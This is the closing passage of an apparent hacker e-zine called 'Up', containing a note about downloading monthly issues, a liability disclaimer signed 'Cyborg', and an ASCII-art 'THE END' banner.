a newsletter nor a mailing list. Just bookmark the website and check
back every month to download the latest issue.
 
                       :..::..End Of File..::..:

                       :..::.File 10 of 10.::..:
                       :..::.:.Disclaimer.:.::.:
                       :..::...By Cyborg...::..:

<*> Use this information at your own risk. Staff or contributors to Up,
nor the persons providing this e-zine, will NOT assume ANY 
responsibility for the use, misuse, or abuse, of the information 
provided herein. The previous information is provided for 
educational purposes ONLY. The informaion is NOT to be used for 
illegal purposes.

By reading this e-zine you ARE AGREEING to the following terms: I
understand that using this information is illegal. I agree to, and
understand, that I am responsible for my own actions. If I get into
trouble using this information for the wrong reasons, I promise not to
place the blame on Up staff, contributors, or anyone that provided this
e-zine. I understand that this information is for educational purposes
only. Thanks for reading.
   ________   __   __   ______      ______   ___    __   ____
  |__    __| |  | |  | |   ___|    |   ___| |   \  |  | |  _ \
     |  |    |  |_|  | |  |__      |  |__   |    \ |  | | | | \
     |  |    |   _   | |   __|     |   __|  |  |\ \|  | | | | |
     |  |    |  | |  | |  |___     |  |___  |  | \    | | |_| /
     |__|    |__| |__| |______|    |______| |__|  \___| |____/

                       :..::..End Of File..::..:
